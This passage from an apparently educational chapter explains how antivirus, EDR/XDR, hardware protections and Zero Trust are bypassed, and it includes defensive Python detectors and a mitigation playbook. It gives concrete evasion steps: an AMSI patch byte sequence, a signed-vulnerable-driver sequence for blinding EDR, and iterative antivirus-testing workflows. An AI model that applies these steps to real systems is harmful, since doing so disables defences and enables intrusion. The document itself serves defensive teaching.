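def interval_cv(timestamps: Sequence[float],
                min_events: int = 6) -> Optional[float]:
    """Coefficient of variation of the gaps between connections.

    Values near 0 mean very regular timing. Returns None when there are
    too few events to judge or all events share one timestamp.
    """
    if len(timestamps) < min_events:
        return None
    ordered = sorted(timestamps)
    gaps = [b - a for a, b in zip(ordered, ordered[1:])]
    mean_gap = statistics.fmean(gaps)
    if mean_gap == 0:
        return None
    return statistics.pstdev(gaps) / mean_gap


def looks_like_beacon(timestamps: Sequence[float],
                      max_cv: float = 0.1) -> bool:
    """Flag connection series whose timing is suspiciously regular."""
    cv = interval_cv(timestamps)
    return cv is not None and cv <= max_cv


if __name__ == "__main__":
    every_minute = [60.0 * i for i in range(20)]
    human_browsing = [0, 5, 200, 210, 900, 905, 3000]
    print(looks_like_beacon(every_minute), looks_like_beacon(human_browsing))
```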
This is an arms race — and defenders have the advantage of breadth. An attacker must defeat every defense. A defender only needs to catch the attacker once.
Chapter 09 covered classic evasion — packers, crypters, process injection. But modern security infrastructure has evolved far beyond signature-based AV. Today's defenders deploy AI/ML models, cloud-detonation sandboxes, Extended Detection & Response (XDR), hardware-enforced security, and Zero Trust architectures. This chapter shows how the attacker side has evolved to match — and how each new defense creates a new bypass technique in an endless arms race.
This section documents publicly known bypass techniques from security research papers, conference talks (DEF CON, Black Hat), and vendor advisories. Understanding how modern defenses are circumvented is essential for building resilient security architectures. All techniques described here have published mitigations.
Traditional AV matched file hashes and byte patterns. Next-Gen AV (NGAV) from vendors like CrowdStrike, SentinelOne, Cylance, and Microsoft Defender for Endpoint uses a multi-layered approach:
① Static ML Model
Before execution. Trained on millions of PE features — import tables, section entropy, string patterns, header anomalies, compiler artifacts. Makes a malicious/benign prediction in <50ms. No signatures needed — classifies never-before-seen files.
Bypass: Adversarial ML — modify PE features (append benign strings, pad sections to lower entropy, add fake imports) to shift the model's decision boundary. Tools: MalGAN, EMBER adversarial.
② Behavioral Analysis
During execution. Monitors API call sequences, memory operations, file system changes, registry modifications, network connections. Builds a behavioral graph and compares against known attack patterns.
Bypass: API call unhooking (Ch 09), indirect syscalls, delayed execution, interleaving malicious calls with benign API noise to dilute the behavioral signal.
③ Cloud Lookup
File hash + metadata sent to vendor cloud in real-time. Cloud has access to global threat intelligence, shared IOCs, and heavier ML models too expensive to run locally. Can reclassify files retroactively after new intelligence arrives.
Bypass: Block outbound connections to AV cloud endpoints (e.g., *.wdcp.microsoft.com), use antiscan services instead of VirusTotal (which shares with vendors), ensure no prior submission of sample.
④ Cloud Sandbox Detonation
Suspicious files uploaded and executed in the vendor's cloud sandbox (Azure for Defender, CrowdStrike's Falcon Sandbox). Runs for 30-120 seconds, captures all behaviors, produces a verdict. More thorough than local analysis.
Bypass: Anti-sandbox evasion (Ch 09 Layer 5), execution delays >120s, environment-keying (only execute if %USERDOMAIN% matches target), human interaction gates (require mouse clicks to proceed).
⑤ Memory Scanning / AMSI
Scans content at runtime — PowerShell scripts, .NET assemblies, VBScript, JScript, even unpacked payloads in memory. AMSI hooks into script engines and provides the AV engine with the decoded content, defeating obfuscation.
Bypass: AMSI patching (Ch 09 Layer 4), hardware breakpoint hooking of AmsiScanBuffer, CLR profiler-based bypass, or avoiding managed runtimes entirely (use native C/C++ payloads).
ML models are the backbone of modern NGAV, but they have fundamental weaknesses that attackers exploit systematically:
ML models classify files based on extracted features. If you know (or can guess) which features the model uses, you can manipulate them without changing the payload's functionality.
// Problem: ML flags high entropy in .text section Fix: Insert dead code (junk functions that are never called) Entropy drops from 7.8 → 6.2 (below suspicion threshold) // Problem: ML flags small import table Fix: Add fake imports that are never used: LoadLibraryA("gdiplus.dll") // GUI library - looks normal GetProcAddress("GdipDrawLine") // never called Import count: 6 → 42 (matches legitimate software) // Problem: ML flags embedded strings ("shellcode", "inject") Fix: Compile-time string encryption (XOR/AES) Strings only exist decrypted in memory at runtime Static ML never sees them // Problem: ML flags abnormal PE section names Fix: Use standard names: .text, .rdata, .data, .rsrc Never use custom names like .crypt, .pack, .vmp
Sophisticated attackers profile the target's specific AV/ML model before deployment:
Step 1: Identify Target AV Recon: job postings mention "CrowdStrike" Or: phishing lure returns Defender-specific error Step 2: Set Up Local Copy of Target AV Install same product + version in test VM Enable cloud features (use burner license) Step 3: Iterative Testing Submit payload → observe detection → modify → resubmit Automated via: DefenderCheck, ThreatCheck These tools binary-search the file to find the EXACT byte range triggering detection Step 4: Feature Perturbation Modify only the flagged features Re-test until 0 detections locally Test against antiscan.me (doesn't share with vendors) Step 5: Deploy FUD window: typically 24-72 hours Before vendor cloud updates models with new sample
EDR watches endpoints. XDR (Extended Detection & Response) correlates signals across endpoints, network, email, cloud, and identity — making evasion exponentially harder because attackers must be invisible across every data source simultaneously.
ENDPOINT signal: svchost.exe (PID 7284) → RWX allocation + beacon behavior
  Alone: Low confidence (svchost does allocate memory legitimately)
NETWORK signal: svchost.exe → HTTPS to cdn-update.azureedge[.]net every 60s
  Alone: Low confidence (legitimate Azure CDN traffic exists)
EMAIL signal: User received .docm attachment 4 minutes before svchost anomaly
  Alone: Low confidence (user receives documents daily)
IDENTITY signal: Same user attempted 3 failed logins to DC01 after svchost spawn
  Alone: Low confidence (password typos happen)
☆ XDR CORRELATION:
  Email(malicious attachment) → Endpoint(process injection) → Network(C2 beacon) → Identity(lateral movement attempt)
  COMBINED CONFIDENCE: 99.7% (automatic containment triggered)
  Actions: Isolate host, disable user account, block C2 domain
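One way to see why individually weak signals add up is a naive-Bayes style combination: each signal multiplies the odds of compromise by a likelihood ratio. The sketch below is illustrative only. It assumes signals are independent, the prior and likelihood ratios are invented numbers, and the `Signal` type and function names are hypothetical; it does not reproduce any vendor's scoring or the 99.7% figure above.

```python
import math
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass
class Signal:
    source: str              # "email", "endpoint", "network", "identity"
    host: str
    timestamp: float         # seconds since epoch
    likelihood_ratio: float  # P(signal | attack) / P(signal | benign)


def combined_probability(signals: Iterable[Signal],
                         prior: float = 0.001) -> float:
    """Combine signals from distinct sources into a posterior probability."""
    log_odds = math.log(prior / (1 - prior))
    seen = set()
    for s in signals:
        if s.source in seen:  # count each data source once
            continue
        seen.add(s.source)
        log_odds += math.log(s.likelihood_ratio)
    return 1 / (1 + math.exp(-log_odds))


def correlate(signals: Iterable[Signal],
              window_s: float = 3600) -> Dict[str, float]:
    """Score each host using signals within window_s of its latest signal."""
    by_host: Dict[str, List[Signal]] = {}
    for s in signals:
        by_host.setdefault(s.host, []).append(s)
    scores = {}
    for host, items in by_host.items():
        latest = max(s.timestamp for s in items)
        recent = [s for s in items if latest - s.timestamp <= window_s]
        scores[host] = combined_probability(recent)
    return scores


if __name__ == "__main__":
    sources = ["email", "endpoint", "network", "identity"]
    events = [Signal(src, "WS-042", 1000.0 + 60 * i, 20.0)
              for i, src in enumerate(sources)]
    print(correlate(events))
```

With these made-up numbers, one signal leaves the posterior below 5%, while four agreeing sources push it above 99%.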
Living-off-the-Land (LOL): Use only built-in OS tools (certutil, mshta, PowerShell) so endpoint signals blend with normal admin activity.
C2 over legitimate services: Abuse Slack, Discord, OneDrive, Google Sheets as C2 channels — network traffic goes to trusted domains.
Credential harvesting before lateral movement: Dump credentials from memory (Mimikatz-style) and use legitimate RDP/WinRM with real creds — identity layer sees "valid" authentication.
Slow & low: Operate over days/weeks at very low volume. XDR correlation windows are typically 24-48 hours — if attack stages span weeks, they may not correlate.
Retroactive correlation: When a new IOC is discovered, XDR searches historical telemetry (30-90 days) — activities that seemed benign at the time are re-evaluated.
UEBA (User Behavior Analytics): ML baselines each user's normal patterns. Even with valid credentials, unusual access times, abnormal file access patterns, or first-time connections trigger anomaly alerts.
Automated response: XDR can isolate a host in <30 seconds — faster than any human attacker can pivot. Even if the attacker evades detection on 3 layers, correlation with the 4th triggers containment.
Modern CPUs and operating systems now enforce security at the hardware level. These protections cannot simply be patched out from userland, however sophisticated the malware is; the bypass attempts listed for each one rely on separate weaknesses.
Windows runs a tiny hypervisor (VBS — Virtualization-Based Security) beneath the OS. The kernel itself runs in a virtual machine. HVCI ensures every driver and kernel module is signed — even a kernel exploit cannot load unsigned code because the hypervisor enforces the policy from a higher privilege level.
Impact: Rootkits and unsigned kernel drivers are blocked even with admin/SYSTEM access. Attackers need a hypervisor escape (extremely rare).
Bypass attempts: Disable VBS via boot config (requires physical access + admin), exploit vulnerable signed drivers (BYOVD — Bring Your Own Vulnerable Driver), hypervisor escape (0-day class).
Intel CET adds a hardware shadow stack that mirrors the software call stack. On every RET instruction, the CPU checks if the return address matches the shadow stack. If they differ (buffer overflow modified the return address), the CPU raises a #CP exception — the exploit fails at the hardware level.
Impact: Classic stack buffer overflow → ROP chain exploits are dead on CET-enabled systems. EIP/RIP hijacking via stack smash no longer works.
Bypass attempts: JIT spray (corrupt JIT-compiled code regions), data-only attacks (corrupt data structures, not code flow), exploit non-CET processes (legacy 32-bit apps).
Secure Boot verifies every component in the boot chain — firmware → bootloader → kernel → drivers — using cryptographic signatures. TPM (Trusted Platform Module) stores measurements of each boot component. If any component is modified (bootkit), the chain breaks and the system won't boot or reports tampered state to remote attestation servers.
Impact: Bootkits (MBR/VBR/UEFI rootkits) that persist below the OS are blocked. BlackLotus (2023) was the first known UEFI bootkit to bypass Secure Boot in the wild.
Bypass: CVE-2022-21894 (BlackLotus exploited a Secure Boot vulnerability). Microsoft revoked the vulnerable bootloader but rollout is slow — many systems remain vulnerable as of 2024.
When HVCI blocks unsigned drivers, attackers bring a legitimately signed but vulnerable driver (e.g., old GPU drivers, anticheat modules, hardware utilities) and exploit its vulnerability to gain kernel code execution. The driver passes signature checks because it is genuinely signed — it's just buggy.
1. Drop signed vulnerable driver: RTCore64.sys (MSI Afterburner) 2. Load via sc.exe create — passes HVCI signature check ✓ 3. Exploit CVE-2019-16098 (arbitrary memory R/W in driver) 4. Use kernel R/W to disable EDR kernel callbacks 5. Remove PsSetCreateProcessNotifyRoutine entries 6. EDR is now fully blinded — kernel telemetry gone Known abused drivers: RTCore64.sys, dbutil_2_3.sys (Dell), gdrv.sys (Gigabyte), ene.sys (ENE Technology), cpuz141.sys Microsoft maintains a blocklist but it's perpetually incomplete.
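On the defensive side, a first-pass audit for known-vulnerable drivers can be as simple as hashing driver files and comparing them against a blocklist. The sketch below assumes the reader supplies a set of SHA-256 hashes from a source they trust; the function names are hypothetical. Real blocklist policies also match on signer and file version, which a hash-only check misses.

```python
import hashlib
from pathlib import Path
from typing import Iterable, List


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """SHA-256 of a file, read in chunks to keep memory use flat."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def find_blocklisted_drivers(directory: str,
                             blocked_hashes: Iterable[str]) -> List[Path]:
    """Return .sys files under `directory` whose hash is on the blocklist."""
    blocked = {h.lower() for h in blocked_hashes}
    hits = []
    for path in sorted(Path(directory).rglob("*.sys")):
        if path.is_file() and sha256_file(path) in blocked:
            hits.append(path)
    return hits


if __name__ == "__main__":
    # Assumed location of installed drivers; the blocklist here is empty,
    # so nothing is reported until real hashes are supplied.
    for hit in find_blocklisted_drivers(r"C:\Windows\System32\drivers", set()):
        print("blocklisted driver present:", hit)
```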
Traditional networks have a perimeter (firewall) — once inside, assets trust each other. Zero Trust assumes every request is potentially malicious, regardless of source. This fundamentally changes the attacker's playbook:
| Zero Trust Principle | What It Blocks | Attacker Workaround |
|---|---|---|
| Verify explicitly — authenticate every request with MFA + device health + location + risk score | Stolen credentials alone are insufficient. Even with valid AD creds, MFA + device compliance check blocks lateral movement. | MFA fatigue attacks (push spam), SIM swapping, adversary-in-the-middle (AiTM) phishing proxies like Evilginx2 that capture session tokens post-MFA. |
| Least-privilege access — users/services get minimum required permissions, just-in-time access only | Compromised accounts can reach only what they're explicitly authorized. No "Domain Admin" always-on access. | Target JIT approval workflows. Social engineer the approver. Abuse legitimate access to escalate via misconfigurations (Azure AD role abuse, delegation attacks). |
| Assume breach — microsegmentation, encrypt all internal traffic, continuous monitoring | Lateral movement hits microsegment boundaries. Internal traffic is TLS-encrypted, preventing sniffing. Every hop is logged. | Abuse allowed application pathways (e.g., if the web server is allowed to talk to the DB, compromise the web server and use its legitimate connection). "Living inside the allowed traffic." |
In a Zero Trust world, the most valuable artifact isn't credentials; it's session tokens. Once a user completes MFA and receives a session artifact (a browser session cookie or, on Azure AD, a Primary Refresh Token), anyone who steals it inherits the authenticated session and bypasses MFA completely. This is why AiTM phishing (Evilginx2, Modlishka), token theft (dumping browser cookies, PRT extraction), and pass-the-cookie attacks are among the dominant initial access techniques in 2024–2026.
The attack surface has expanded far beyond Windows endpoints. Modern attackers target the entire infrastructure stack:
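SSRF → IMDS: Server-Side Request Forgery hitting the cloud metadata service (169.254.169.254) to steal instance credentials. Where the metadata service answers unauthenticated GET requests (as AWS IMDSv1 does), a single HTTP request can yield the instance role's credentials, and the impact then depends on how much that role is allowed to do. AWS IMDSv2 requires a session token obtained with a PUT request, which blocks most simple SSRF.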
IAM privilege escalation: Misconfigured AWS IAM roles/policies allowing iam:PassRole + lambda:CreateFunction → create Lambda with admin role → full account takeover.
Container escape: Kubernetes pods with privileged: true or mounted Docker socket → escape to host → pivot across cluster.
Supply chain: Compromise CI/CD pipelines (GitHub Actions, Jenkins), inject backdoors into build artifacts that deploy to thousands of targets (SolarWinds model).
macOS Gatekeeper: Blocks unsigned/unnotarized apps. Bypass: Abuse archive formats that strip quarantine attributes (CVE-2022-42821 — Archive Utility bypass).
macOS SIP (System Integrity Protection): Kernel-level protection of system files. Bypass: Exploit entitled Apple daemons that have SIP exceptions (e.g., the system_installd Shrootless bug, CVE-2021-30892).
Linux eBPF monitoring: Modern EDRs use eBPF for deep kernel visibility. Bypass: Manipulate eBPF maps, exploit eBPF verifier bugs (CVE-2021-4204), or use kernel-level rootkits to hide from eBPF probes.
Linux SELinux/AppArmor: Mandatory access controls. Bypass: Exploit processes running in unconfined domains, abuse allowed transitions, or find kernel vulns that bypass MAC entirely.
Despite every bypass technique above, the defender's position has never been stronger. Here's why:
Attack cost has skyrocketed: In 2015, a reliable exploit chain cost ~$50K. In 2026, a full iOS chain is worth $2M+ (Zerodium pricing). Hardware security, HVCI, CET, and hardened browsers have made exploitation dramatically more expensive.
Detection breadth is overwhelming: XDR correlates 5+ data sources. An attacker who evades endpoint ML still gets caught by network anomaly detection, email analysis, identity analytics, or cloud audit logs.
Automation favors defenders: SOAR platforms can isolate hosts, revoke tokens, and block IPs in under 30 seconds. The attacker's window between initial access and containment is shrinking every year.
Hardware can't be patched by malware: HVCI, CET, Secure Boot, and TPM create trust anchors that software-only attacks simply cannot reach. This is a fundamental architectural advantage.
These interactive demos simulate what happens during real attacks — using only safe, simulated data in your browser. No actual exploits, shellcode, or malicious network connections are involved. Each demo recreates the visible and invisible output an analyst would see when examining a real attack, so you can understand both what the user sees (nothing unusual) and what's actually happening behind the scenes.
What this simulates: Every Office/PDF document contains metadata — author names, software versions, creation timestamps, printer names, file paths, and revision histories. Attackers use this for reconnaissance: before sending a phishing email, they'll harvest documents from the target organization's website (investor reports, published PDFs, public filings) and extract metadata to learn employee names, internal software versions, directory structures, and network paths. This demo shows you the exact metadata fields that tools like exiftool, FOCA, and metagoofil extract from a typical Office document.
What to look for: The Author field reveals real employee names. The Software field reveals Office version (which tells the attacker which CVEs might work). The Template field can reveal internal server paths. The LastSavedBy field shows who edited the document last — potentially a different employee than the author.
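To audit your own documents before publishing them, the same fields can be read with the standard library alone. A .docx file is a ZIP archive, and the author, last editor, and timestamps live in `docProps/core.xml`. The sketch below reads only that part (application and template details live in `docProps/app.xml`, which is not parsed here); `read_core_properties` and the field labels are names chosen for the example.

```python
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces used by the OOXML core-properties part.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

# Display label -> element name inside docProps/core.xml.
FIELDS = {
    "Author": "dc:creator",
    "LastSavedBy": "cp:lastModifiedBy",
    "Created": "dcterms:created",
    "Modified": "dcterms:modified",
    "Revision": "cp:revision",
}


def read_core_properties(docx):
    """Return the core metadata fields present in a .docx file.

    `docx` may be a file path or a binary file-like object.
    """
    with zipfile.ZipFile(docx) as archive:
        root = ET.fromstring(archive.read("docProps/core.xml"))
    found = {}
    for label, tag in FIELDS.items():
        element = root.find(tag, NS)
        if element is not None and element.text:
            found[label] = element.text
    return found


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, read_core_properties(path))
```

Running it over a folder of files destined for a public website shows which names and dates would be exposed.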
What this simulates: A zero-click exploit targeting a messaging app. In real attacks (like FORCEDENTRY or the WhatsApp VOIP bug), the victim receives a message or call that triggers automatic parsing of malicious data — no taps, clicks, or interaction required. This demo recreates the kill chain: (1) incoming message notification appears, (2) the messaging app's parser processes the attachment automatically, (3) the parser triggers a buffer overflow in the image/media decoder, (4) the overflow redirects execution to shellcode, (5) the shellcode installs a persistent implant. Everything happens in under 2 seconds — the victim's only visible indicator is a brief notification that may disappear.
What to look for: Watch the timing — the exploit completes before a human could possibly react. Notice how the "legitimate" app functionality (receiving a message) is the attack vector. In real forensics, the only artifact might be a log entry showing the message was received and deleted, or an anomalous crash report from the parser component.
What this simulates: What happens inside the Office process when a user clicks "Enable Content" on a macro-laden document. In the real attack: (1) Office loads the VBA project from the document's vbaProject.bin OLE stream, (2) it compiles the VBA code to p-code, (3) it executes Auto_Open() or Document_Open() automatically, (4) the macro uses Shell() or WScript.Shell to launch PowerShell, (5) PowerShell downloads and executes a second-stage payload from the attacker's C2 server. This demo shows each stage with the actual process tree and command lines that a forensic analyst would see in Sysmon logs.
What to look for: The process chain: WINWORD.EXE → cmd.exe → powershell.exe → beacon.exe. In real attacks, the PowerShell command is often base64-encoded (-enc flag) and uses Invoke-Expression (IEX) with Net.WebClient.DownloadString() to pull the next stage entirely in memory — never touching disk.
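For an analyst reading such a command line in a log, the encoded argument is quick to recover: PowerShell's encoded-command parameter is Base64 over UTF-16LE text. The sketch below is a triage helper under simple assumptions (whitespace-separated arguments, and the flag written as a prefix of `EncodedCommand` or as `-ec`); the function names are hypothetical.

```python
import base64
from typing import Optional


def decode_encoded_command(b64_text: str) -> str:
    """Decode a PowerShell encoded command (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64_text, validate=True).decode("utf-16-le")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Find an encoded-command argument in a command line and decode it.

    Returns None when no such flag is present or the value does not decode.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[0] not in "-/":
            continue
        name = flag[1:].lower()
        # Accept any prefix of the full parameter name, plus the -ec alias.
        if name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return decode_encoded_command(value.strip("\"'"))
            except ValueError:  # covers bad Base64 and bad UTF-16
                return None
    return None


if __name__ == "__main__":
    payload = base64.b64encode("Write-Output 1".encode("utf-16-le")).decode()
    line = f"powershell.exe -nop -w hidden -ep bypass -enc {payload}"
    print(extract_encoded_command(line))
```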
What this simulates: The complete lifecycle of a malicious PDF being opened in Adobe Reader. This is the same attack detailed in Section 05 (Exploit Crafting Pipeline), but shown from the runtime perspective — what actually happens second by second inside the Reader process. The demo traces: (1) PDF header parsing and object loading, (2) Catalog traversal finding the /OpenAction reference, (3) JavaScript Action object loading and stream decompression, (4) SpiderMonkey JS engine executing the heap spray loop (allocating ~200MB of NOP sled + shellcode), (5) the vulnerable API call (Collab.collectEmailInfo) triggering the buffer overflow, (6) EIP hijack to 0x0C0C0C0C, (7) CPU sliding through the NOP sled, (8) shellcode execution — PEB walk → API resolution → download → backdoor execution.
What to look for: The heap spray creates a distinctive memory pattern — hundreds of identical 1MB blocks at predictable addresses. EDR tools detect this by monitoring VirtualAlloc call frequency. The vulnerability trigger (Collab.collectEmailInfo) is a known dangerous function that PDF security scanners flag. The child process spawn (AcroRd32.exe → cmd.exe) is the most reliable detection point.
The following demos simulate the evasion techniques covered in Chapter 09 (FUD). Each one recreates what an analyst would see in process monitors, debuggers, and EDR telemetry when these techniques are used in real malware.
What this simulates: A raw RAT payload (AsyncRAT.exe) being processed through a crypter. The demo shows the exact sequence: (1) the original executable is scanned and flagged by 47/72 AV engines, (2) the crypter reads the PE file, encrypts each section with AES-256, (3) a new stub executable is generated that contains the encrypted payload as a resource, (4) at runtime the stub decrypts the payload in memory and passes control to the original entry point — never writing the decrypted payload to disk. The final stub is scanned again: 0/72 detections. This is exactly how services like Veil, Hyperion, and commercial crypters work.
What to look for: Notice the entropy change. The original PE has distinct .text, .data, and .rdata sections with varying entropy. After crypting, the payload blob shows near-uniform entropy of about 7.98 bits per byte, close to the 8.0 maximum of random data. EDR tools flag this because ordinary unpacked code rarely has sections above roughly 7.0, although compressed installers and packed software can also score high. Also watch the stub's import table: it imports only VirtualAlloc, RtlMoveMemory, and a few crypto APIs, a suspiciously minimal import table compared to normal software.
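The entropy figure quoted above is Shannon entropy measured in bits per byte. A minimal sketch of the calculation follows, assuming the section contents are already available as a `bytes` object (extracting real PE sections is out of scope here); the sample inputs are made up for illustration.

```python
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    # Sum of -p * log2(p) over every byte value that occurs.
    return sum(-(n / total) * math.log2(n / total) for n in counts.values())


# Illustrative inputs: constant padding, English-like text, random bytes.
low = shannon_entropy(b"A" * 4096)
text = shannon_entropy(b"The quick brown fox jumps over the lazy dog. " * 100)
high = shannon_entropy(os.urandom(65536))

print(f"padding: {low:.2f}  text: {text:.2f}  random: {high:.2f}")
```

Encrypted or compressed data behaves like the random sample, which is why a threshold near 7.0 is a common triage heuristic rather than proof of malice.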
What this simulates: The complete RunPE process hollowing technique. A malicious loader spawns a legitimate Windows process (svchost.exe) in a SUSPENDED state, hollows out its memory, writes a malicious payload into the hollowed process, fixes up the thread context to point to the new entry point, and resumes execution. The result: the malicious code runs under the identity of a trusted Windows process. This is the #1 technique used by crypter stubs to execute decrypted payloads in memory.
What to look for: Watch the API call sequence, the pattern that EDR tools build signatures on: CreateProcess(SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread. Any process that calls this chain in order is very likely performing process hollowing. Also notice the parent-child mismatch: svchost.exe is normally spawned by services.exe, not by an arbitrary executable, and EDR flags this anomaly.
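From the defender's side, spotting that chain amounts to an ordered-subsequence match over a process's API trace. The sketch below assumes the trace is already a flat list of API names, which is a simplification: a real sensor would also record arguments such as the CREATE_SUSPENDED flag and the target process handle.

```python
from typing import Iterable, Sequence

# The chain named in the text. "CreateProcess" stands for a call made with the
# CREATE_SUSPENDED flag; this toy trace format does not record flags.
HOLLOWING_CHAIN = (
    "CreateProcess",
    "NtUnmapViewOfSection",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "SetThreadContext",
    "ResumeThread",
)


def contains_in_order(trace: Iterable[str], pattern: Sequence[str]) -> bool:
    """True if every step of pattern appears in trace, in order (gaps allowed)."""
    remaining = iter(trace)
    # Each any() consumes the iterator up to the matching call, so the next
    # step can only match later entries.
    return all(any(call == step for call in remaining) for step in pattern)


# Illustrative traces, not captured from real software.
noisy_trace = [
    "LoadLibrary", "CreateProcess", "NtUnmapViewOfSection", "GetLastError",
    "VirtualAllocEx", "WriteProcessMemory", "WriteProcessMemory",
    "SetThreadContext", "ResumeThread",
]
benign_trace = ["CreateProcess", "WaitForSingleObject", "CloseHandle"]

print(contains_in_order(noisy_trace, HOLLOWING_CHAIN))
print(contains_in_order(benign_trace, HOLLOWING_CHAIN))
```

Allowing gaps between steps matters because real traces interleave unrelated calls, and loaders often write memory in several chunks.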
What this simulates: An attacker bypassing the Anti-Malware Scan Interface (AMSI) in PowerShell before executing a malicious script. AMSI is Microsoft's scanning hook: PowerShell, VBScript, and JScript content is sent to the installed AV engine before execution. Attackers bypass it by patching the AmsiScanBuffer function in memory so that scans no longer flag anything. This demo shows: (1) a malicious PowerShell command being blocked by AMSI, (2) the memory patch being applied (overwriting the first bytes of AmsiScanBuffer with a short stub that returns immediately), (3) the same command now executing successfully because AMSI no longer scans it.
What to look for: The bypass is a single memory write of 6 bytes (0xB8 0x57 0x00 0x07 0x80 0xC3 = mov eax, 0x80070057; ret) at the start of amsi.dll!AmsiScanBuffer. The function then returns the error code E_INVALIDARG without scanning, and the caller treats the failed scan as nothing detected, so content is no longer blocked. Defenders detect this by monitoring VirtualProtect calls targeting amsi.dll memory regions, or by using ETW events that fire before AMSI even processes the scan.
What this simulates: How malware evades EDR (Endpoint Detection & Response) by bypassing userland hooks. Modern EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical ntdll.dll functions — when malware calls NtAllocateVirtualMemory or NtWriteVirtualMemory, the hook redirects execution to the EDR's monitoring code first. This demo shows two bypass methods: (1) Fresh DLL mapping — reading a clean copy of ntdll.dll from disk and overwriting the hooked copy in memory, and (2) Direct syscalls — calling the kernel directly via the syscall instruction, completely skipping ntdll.dll and all its hooks.
What to look for: In Method 1, watch the EDR hooks disappear: the function prologue changes from jmp EDR_Hook back to the original mov r10, rcx; mov eax, SSN. In Method 2, notice the syscall is made directly from the malware's own code, with no call into ntdll.dll at all. Defenders counter this with kernel callbacks (which can't be unhooked from userland) and by monitoring for processes that read ntdll.dll from disk with CreateFile, which legitimate software rarely does.
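The prologue difference is easy to check once the first bytes of a stub have been read. A minimal sketch, assuming x64 stubs and that the bytes were obtained elsewhere (for example from a memory dump); the sample byte strings and the syscall number in them are hypothetical.

```python
from typing import Optional

# x64 encoding of "mov r10, rcx" (4C 8B D1) followed by the opcode of
# "mov eax, imm32" (B8). The next four bytes hold the syscall number (SSN).
CLEAN_PROLOGUE = bytes.fromhex("4c8bd1b8")
JMP_REL32 = b"\xe9"


def classify_stub(first_bytes: bytes) -> str:
    """Classify the start of an ntdll syscall stub."""
    if first_bytes[:4] == CLEAN_PROLOGUE:
        return "clean"
    if first_bytes[:1] == JMP_REL32:
        return "hooked"
    return "unknown"


def syscall_number(first_bytes: bytes) -> Optional[int]:
    """Return the SSN from a clean stub, or None if it cannot be read."""
    if first_bytes[:4] != CLEAN_PROLOGUE or len(first_bytes) < 8:
        return None
    return int.from_bytes(first_bytes[4:8], "little")


# Hypothetical samples: an unmodified stub and one starting with a jump.
clean_stub = bytes.fromhex("4c8bd1b818000000")
hooked_stub = bytes.fromhex("e91234567800cccc")

print(classify_stub(clean_stub), syscall_number(clean_stub))
print(classify_stub(hooked_stub), syscall_number(hooked_stub))
```

The same comparison works in both directions: analysts use it to confirm that an EDR hook is present, and detection engineers use it to notice when a hook that should be there has been removed.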
What this simulates: A malware sample performing environment checks before executing its payload. Sophisticated malware won't detonate in analysis environments — it checks for signs of sandboxes (low CPU cores, small RAM, short uptime), virtual machines (VMware/VirtualBox artifacts, hypervisor CPUID bit), and debuggers (timing checks, PEB flags, hardware breakpoints). If any check fails, the malware exits cleanly or runs benign code instead — appearing "clean" to automated analysis systems. This demo runs through real checks that malware like Emotet, TrickBot, and Cobalt Strike beacons perform.
What to look for: Notice the layered approach — the malware doesn't rely on a single check. It performs 12+ checks across CPU, memory, processes, registry, timing, and user behavior. Each check alone might have false positives, but the combination creates a reliable sandbox fingerprint. Pay attention to the mouse movement check — many sandboxes have static cursors. The "delayed execution" trick (sleeping 5+ minutes) is designed to outlast sandbox analysis timeouts, which typically run samples for 60-120 seconds.
setTimeout() calls and DOM manipulation. No network requests are made. No files are created. No system APIs are called. The "hex bytes" and "memory addresses" shown are pre-written strings — not actual memory contents. You can verify this by viewing the page source.
Understanding exploits is only valuable if it improves your defense. Every exploit shown in this page has specific, actionable countermeasures. Below is a comprehensive defense playbook organized by attack type — each item explains what to do, why it works, and what it specifically prevents.
reg delete HKCR\ms-msdt /f as administrator. MSDT is rarely used and provides a direct code execution path through URL protocol handlers. Why it works: Without the protocol handler registered, the OS ignores the ms-msdt: URL scheme, so the bridge between Office and PowerShell execution doesn't exist. Specifically prevents: Follina (CVE-2022-30190) and any future attacks abusing the MSDT protocol.
WINWORD.EXE → cmd.exe chains), "Block Office from creating executable content" (prevents malware drops), "Block Office from injecting code into other processes" (prevents process hollowing), "Block Win32 API calls from Office macros" (prevents Shell() calls). Why it works: Even if a macro or exploit executes, ASR rules block the specific OS operations the attacker needs for the next stage. Specifically prevents: All macro-based downloaders, all child process spawning, all process injection from Office contexts.
No single control stops everything, and that's by design. The goal is to create overlapping layers where each control catches what the others miss:
Layer 1 — Prevention: Patching + ASR rules + Lockdown Mode → stops known exploits before they execute.
Layer 2 — Detection: EDR + email sandbox + network monitoring → catches exploit behavior even if the vulnerability is unknown (zero-day).
Layer 3 — Response: Incident response plan + forensic capability + device reboot procedures → limits damage when an attack succeeds.
Layer 4 — Recovery: Backups + re-imaging capability + credential rotation → restores operations after a breach.
If any one layer catches the attack, the kill chain is broken. An attacker must bypass every layer to succeed. This asymmetry favors the defender — the attacker must be perfect, you only need to catch them once.
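The "must bypass every layer" argument can be made concrete with a little arithmetic. The sketch below assumes each layer catches an attack independently with some probability; both the independence assumption and the catch rates are hypothetical, chosen only to show the shape of the calculation.

```python
from math import prod
from typing import Iterable


def evasion_probability(catch_rates: Iterable[float]) -> float:
    """Probability an attack slips past every layer, assuming independence."""
    return prod(1.0 - rate for rate in catch_rates)


# Hypothetical per-layer catch rates, not measured values.
layers = {"prevention": 0.70, "detection": 0.60, "response": 0.50}

p_evade = evasion_probability(layers.values())
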